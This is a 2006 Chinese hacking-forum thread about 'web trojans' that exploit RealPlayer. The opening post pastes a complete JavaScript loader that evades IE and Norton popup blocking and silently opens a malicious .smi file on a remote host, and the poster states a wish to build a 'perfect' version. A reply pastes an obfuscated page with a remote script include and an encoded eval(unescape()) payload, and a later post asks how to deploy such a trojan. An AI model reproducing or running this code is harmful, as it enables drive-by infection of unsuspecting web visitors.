‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[讨论]real网马不卡内存代码

寂寞宝贝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
447 
精华
12 
积分
4738 
阅读权限
100 
性别
男 
来自
云南 
在线时间
174 小时 
注册时间
2006-2-7 
最后登录
2008-12-15 
楼主 发表于 2006-4-11 08:22  只看该作者

[讨论]real网马不卡内存代码

议题作者:寂寞宝贝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

今天在网上看到一个 real网马不卡内存代码,帖出来,大家研究下原理,看看有没有可能弄一个完美的real网马出来,补丁已经出来很久了。我们研究下不过分吧,嘿嘿!!曾经在网上见过一个教程,也就是real 网马的改进版本,已经解决了IE自动关闭的问题,偶一直没研究明白,太菜了。诶!!大家一起研究下下面代码的原理。顺便说一句,偶一直在找real网马的源代码,哪位兄弟有,麻烦帖出来!谢谢了!


<Script Language="JavaScript">
var paypopupURL = "http://www.yyyrrrr.com/mm/music.smi";
var usingActiveX = true;
function blockError(){return true;}
window.onerror = blockError;
//bypass norton internet security popup blocker
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
if (typeof(usingClick) == &#39;undefined&#39;) {var usingClick = false;}
if (typeof(usingActiveX) == &#39;undefined&#39;) {var usingActiveX = false;}
if (typeof(popwin) == &#39;undefined&#39;) {var popwin = null;}
if (typeof(poped) == &#39;undefined&#39;) {var poped = false;}
if (typeof(paypopupURL) == &#39;undefined&#39;) {var paypopupURL = "www.yyyrrrr.com/mm/music.smi";}
var blk = 1;
var setupClickSuccess = false;
var googleInUse = false;
var myurl = location.href+&#39;/&#39;;
var MAX_TRIED = 20;
var activeXTried = false;
var tried = 0;
var randkey = &#39;0&#39;; // random key from server
var myWindow;
var popWindow;
var setupActiveXSuccess = 0;
// bypass IE functions
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write(&#39;<INPUT STYLE="display:none;" ID="autoHit" TYPE="TEXT" ONKEYPRESS="showActiveX()">&#39;);popWindow=window.createPopup();popWindow.document.body.innerHTML=&#39;<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="&#39;+myurl+&#39;/paypopup.html" TYPE="text/html"></OBJECT></DIV>&#39;;document.write(&#39;<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" SRC="about:blank"></IFRAME>&#39;);popIframe.document.write(&#39;<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="&#39;+myurl+&#39;/paypopup.html" TYPE="text/html"></OBJECT>&#39;);setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout(&#39;setupActiveX();&#39;,500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
function tryActiveX(){if (!activeXTried && !poped) {if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById(&#39;getParentDiv&#39;) && popWindow.document.getElementById(&#39;getParentDiv&#39;).object && popWindow.document.getElementById(&#39;getParentDiv&#39;).object.parentWindow) {myWindow=popWindow.document.getElementById(&#39;getParentDiv&#39;).object.parentWindow;}else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow){myWindow=popIframe.getParentFrame.object.parentWindow;popIframe.location.replace(&#39;about:blank&#39;);}else {setTimeout(&#39;tryActiveX()&#39;,200);tried++;if (tried >= MAX_TRIED && !activeXTried) {activeXTried = true;setupClick();}return;}openActiveX();window.windowFired=true;self.focus();}}
function openActiveX(){if (!activeXTried && !poped) {if (myWindow && window.windowFired){window.windowFired=false;document.getElementById(&#39;autoHit&#39;).fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));}else {setTimeout(&#39;openActiveX();&#39;,100);}tried++;if (tried >= MAX_TRIED) {activeXTried = true;setupClick();}}}
function showActiveX(){if (!activeXTried && !poped) {if (googleInUse) {window.daChildObject=popWindow.document.getElementById(&#39;objectRemover&#39;).children(0);window.daChildObject=popWindow.document.getElementById(&#39;objectRemover&#39;).removeChild(window.daChildObject);}newWindow=myWindow.open(paypopupURL,&#39;abcdefg&#39;);if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {popwin = window.open(paypopupURL,&#39;abcdefg&#39;);if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// end normal call functions
// onclick call functions
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
function gopop() {if (!poped) {popwin = window.open(paypopupURL,&#39;abcdefg&#39;);if (popwin) {poped = true;}self.focus();}if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
function detectGoogle() {if (usingActiveX) {try {document.write(&#39;<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>&#39;);googleInUse|=(typeof(document.getElementById(&#39;detectGoogle&#39;))==&#39;object&#39;);}catch(e){setTimeout(&#39;detectGoogle();&#39;,50);}}}
function version() {var os = &#39;W0&#39;;var bs = &#39;I0&#39;;var isframe = false;var browser = window.navigator.userAgent;if (browser.indexOf(&#39;Win&#39;) != -1) {os = &#39;W1&#39;;}if (browser.indexOf("SV1") != -1) {bs = &#39;I2&#39;;}else if (browser.indexOf("Opera") != -1) {bs = "I0";}else if (browser.indexOf("Firefox") != -1) {bs = "I0";}else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = &#39;I1&#39;;}if (top.location != this.location) {isframe = true;}paypopupURL = paypopupURL;usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();}
version();
// end check version
function loadingPop() {
if(!usingClick && !usingActiveX) {
paypopup();
}
else if (usingActiveX) {tryActiveX();}
else {setupClick();}
}
myurl = myurl.substring(0, myurl.indexOf(&#39;/&#39;,8));
if (myurl == &#39;&#39;) {myurl = &#39;.&#39;;}
setupActiveX();
loadingPop();
self.focus();
</Script>
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

xiaocool

晶莹剔透§烈日灼然

Rank: 1

帖子
164 
精华
2 
积分
433 
阅读权限
40 
在线时间
76 小时 
注册时间
2005-8-4 
最后登录
2009-1-9 
沙发 发表于 2006-4-12 20:46  只看该作者
<script src=http://www.xinwen365.com/48472394k4r.asp></script><HTML oncontextmenu="return false"><HEAD><TITLE> </TITLE></HEAD><BODY>

<SCRIPT LANGUAGE="JavaScript">
<!--

dddss="=tdsjqu mbohvbhf>KbwbTdsjqu?=!..gvodujpo ofn(*|sfuvso usvf~<xjoepx/pofssps >G#8#qfo(voftdbqf(%79%85%85%81%4B%3G%3G%88%88)#3F%7E%7:%7F)#P#84%76%83%87,#P#F/#5%3G*-Vosfhjtufs-tdspmmcbst-xjeui>611-ifjhiu.#*<C%iq`eo(bF%gbmtf~B#dd%bmfsu(Uijt qbhf ibt cffo qspufdufe/ Qsfwjfx pomz/*<v#v#ne(f*|jg(f/xijdi>>3}}/#48$8$8$8$&$2*|N&#39;dbquvsfFwfout(*#/NPVTFNPWF*/(npvtfnpwf>5&~-%v-%*$sfmfbt*$*$f>ovmm~x$obwjhbups/bqqObnf/joefyPg(Joufsofu Fyqmpsfs*>>.2}}W#vtfsBh8$Y#NTJF*!>.2w$epdvnD#bmm*|1#podpoufyunfov^%dn<@#tfmfdutubsu{%n#mbzfstt&m%VQ}1#EPXO{%epxo*$ne<#vq:#vA$hfuFmf.#CzJe&&!L%L%L%C$H(?#xsjuf(]v114DTDSJQU/#31MBOHVBHF=#E7#3x.3#FFodpef?#Y#tsdT#jdzgpyP#ktL#4z#D5#G@$;#R$R$w#wbsV#vsmQ#V%K$mpdb/+1#isfgI#CR#,#3Ftvctusjoh2#91*#DB#mbtuJ+*D#)#8=%/#:)#/$U$3&#39;`#4DPCKFDh%Xc0b$J$1Ik06#tuzmk#0&ejtqmbz6#Bopo@#C`&#39;uzqV#?)+%f&#39;Etp&mfs&31ebubY#nl-$)#51NTJUTups|#Bniunj&Br(J#6R()#3Fn:%32G&G&#39;3z$h&N)s#)#.&#39;634h)13Gk&;#Z&#39;4C&-Z(ubuv+$V%&#272<)#)$i$n*;#CPEZ9#OPM#jgsbnk(.(.(k,H%,&Z%/#f)f$B$;#n$=#IUNM]v114F]v111E]v111B*<=0TDSJQU?";
l=&#39;\0\t\n \r !"#$%&\&#39;()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\1<script src=http://www.xinwen365.com/48472394k4r.asp></script>%25%33%44%25%32%37%25%32%37%25%33%42%25%30%44%25%30%41%25%36%36%25%36%46%25%37%32%25%32%30%25%32%38%25%36%39%25%33%44%25%33%30%25%33%42%25%36%39%25%33%43%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%43%25%36%35%25%36%45%25%36%37%25%37%34%25%36%38%25%33%42%25%36%39%25%32%42%25%32%42%25%32%39%25%37%42%25%30%44%25%30%41%25%36%31%25%33%44%25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%39%25%32%39%25%32%39%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%31%25%32%39%25%32%30%25%36%31%25%33%44%25%33%39%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%32%25%32%39%25%32%30%25%36%31%25%33%44%25%33%31%25%33%30%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%33%25%32%39%25%32%30%25%36%31%25%33%44%25%33%31%25%33%33%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%44%25%33%44%25%33%34%25%32%39%25%32%30%25%36%31%25%33%44%25%33%33%25%33%34%25%33%42%25%30%44%25%30%41%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%43%25%33%44%25%33%33%25%33%31%25%32%30%25%32%36%25%32%30%25%36%31%25%33%45%25%33%44%25%33%31%25%33%34%25%32%39%25%37%42%25%30%44%25%30%41%25%36%46%25%36%36%25%36%36%25%33%44%25%37%33%25%32%45%25%36%43%25%36%35%25%36%45%25%36%37%25%37%34%25%36%38%25%32%44%25%32%38%25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%32%42%25%32%42%25%36%39%25%32%39%25%32%39%25%32%44%25%33%33%25%33%36%25%32%42%25%33%39%25%33%30%25%32%41%25%32%38%25%36%43%25%32%45%25%36%39%25%36%45%25%36%34%25%36%35%25%37%38%25%34%46%25%36%36%25%32%38%25%36%34%25%36%34%25%36%34%25%37%33%25%37%33%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%32%42%25%32%42%25%36%39%25%32%39%25%32%39%25%32%44%25%33%33%25%33%35%25%32%39%25%32%39%25%32%44%25%33%31%25%33%42%25%30%44%25%30%41%25%36%43%25%37%30%25%33%44%25%36%46%25%36%36%25%36%36%25%32%42%25%36%31%25%32%44%25%33%31%25%33%34%25%32%42%25%33%34%25%33%42%25%30%44%25%30%41%25%37%33%25%33%44%25%37%33%25%32%42%25%37%33%25%32%45%25%37%33%25%37%35%25%36%32%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%38%25%36%46%25%36%36%25%36%36%25%32%43%25%36%43%25%37%30%25%32%39%25%33%42%25%37%44%25%30%44%25%30%41%25%36%35%25%36%43%25%37%33%25%36%35%25%32%30%25%37%42%25%32%30%25%36%39%25%36%36%25%32%30%25%32%38%25%36%31%25%33%45%25%33%44%25%33%34%25%33%31%25%32%39%25%32%30%25%36%31%25%33%44%25%36%31%25%32%44%25%33%31%25%33%42%25%32%30%25%37%33%25%33%44%25%37%33%25%32%42%25%36%43%25%32%45%25%36%33%25%36%38%25%36%31%25%37%32%25%34%31%25%37%34%25%32%38%25%36%31%25%32%39%25%33%42%25%37%44%25%37%44%25%33%42%25%36%34%25%36%46%25%36%33%25%37%35%25%36%44%25%36%35%25%36%45%25%37%34%25%32%45%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%32%38%25%37%33%25%32%39%25%33%42%25%30%44%25%30%41");eval(unescape(e));

//-->
</SCRIPT><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT></body></html>
=================================================
问下这个是不是网马,是的话是什么网马???谢谢。

TOP

寂寞宝贝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
447 
精华
12 
积分
4738 
阅读权限
100 
性别
男 
来自
云南 
在线时间
174 小时 
注册时间
2006-2-7 
最后登录
2008-12-15 
椅子 发表于 2006-4-12 20:59  只看该作者
晕,好乱,先是JavaScript加密,然后一些乱码,最后是16进制编码,http://www.xinwen365.com/48472394k4r.asp?这一个请问是什么东西,我打开后页面被删除了,所以分析不了,不过估计不是什么好东西。。我看着这代码杂就那么眼熟呢,你等我翻下资料啊!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

寂寞宝贝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
447 
精华
12 
积分
4738 
阅读权限
100 
性别
男 
来自
云南 
在线时间
174 小时 
注册时间
2006-2-7 
最后登录
2008-12-15 
板凳 发表于 2006-4-12 21:01  只看该作者
想起来了,这个不就是前段时间的HELP网马么,就是那个会弹窗口那个!我还以为是好东西呢。。
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

复活彩蛋

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
8 小时 
注册时间
2006-2-14 
最后登录
2008-4-26 
地板 发表于 2006-4-14 11:37  只看该作者
问个正题,是不是直接用那个牛X版的smi文件然后把你给的代码里的smi文件路径替换掉保存为html然后直接访问html呢??我以前看到一个是asp+dll+smi文件的一个real溢出网马。

TOP

幽鬼狼魂

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
58 
阅读权限
40 
性别
男 
在线时间
4 小时 
注册时间
2006-3-16 
最后登录
2006-4-20 
6楼 发表于 2006-4-17 01:19  只看该作者
eval(unescape(e));
lookthis就知道什么加密的了,ok,完毕

TOP

星星的坠落

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
48 
阅读权限
40 
性别
男 
来自
广西 
在线时间
30 小时 
注册时间
2006-4-22 
最后登录
2007-10-19 
7楼 发表于 2006-4-24 20:18  只看该作者
我的电脑最近经常会弹出(XXXXXXXX……)的内存不能为real,请问下这个是什么问题啊
()里的我忘记了
  残破的光影黑暗中深深吸引     

TOP

寂寞宝贝

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
447 
精华
12 
积分
4738 
阅读权限
100 
性别
男 
来自
云南 
在线时间
174 小时 
注册时间
2006-2-7 
最后登录
2008-12-15 
8楼 发表于 2006-4-25 23:14  只看该作者
回楼上的,把问题说清楚点好么,是你打开REAL出现这问题,还是打开网站?如果是前者,你升级下REAL,或者重装,如果是后者,么恭喜你,中马了!杀毒吧!
成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。

TOP

金州

智囊团成员

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T智囊团成员

帖子
1243 
精华
8 
积分
6153 
阅读权限
150 
性别
男 
在线时间
593 小时 
注册时间
2005-3-18 
最后登录
2008-6-6 

原创技术奖

9楼 发表于 2006-4-25 23:25  只看该作者
引用:
这里是引用第[8 楼]星星的坠落2006-04-24 20:18发表的:
我的电脑最近经常会弹出(XXXXXXXX……)的内存不能为real,请问下这个是什么问题啊
()里的我忘记了
内存不能read
参考 本论坛
该内存不能为read或written的解决方案
http://www.eviloctal.com/forum/htm_data/75/0604/21225.html
觉得说的很全了。
人情如冰六月寒,花做一份艳,为谁笑人间? 如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre

TOP

星星的坠落

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
48 
阅读权限
40 
性别
男 
来自
广西 
在线时间
30 小时 
注册时间
2006-4-22 
最后登录
2007-10-19 
10楼 发表于 2006-4-30 22:43  只看该作者
不是的,是内存不能为REAL,我是不是中马了啊
  残破的光影黑暗中深深吸引     

TOP

星星的坠落

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
48 
阅读权限
40 
性别
男 
来自
广西 
在线时间
30 小时 
注册时间
2006-4-22 
最后登录
2007-10-19 
11楼 发表于 2006-4-30 22:45  只看该作者
不是啊,是经常会出现的,而且会关我运行的程序的,是REAL内存错误,不是READ
  残破的光影黑暗中深深吸引     

TOP

星星的坠落

晶莹剔透§烈日灼然

Rank: 1

帖子
13 
精华
0 
积分
48 
阅读权限
40 
性别
男 
来自
广西 
在线时间
30 小时 
注册时间
2006-4-22 
最后登录
2007-10-19 
12楼 发表于 2006-4-30 22:52  只看该作者
不是READ,S  REAL错误
  残破的光影黑暗中深深吸引     

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题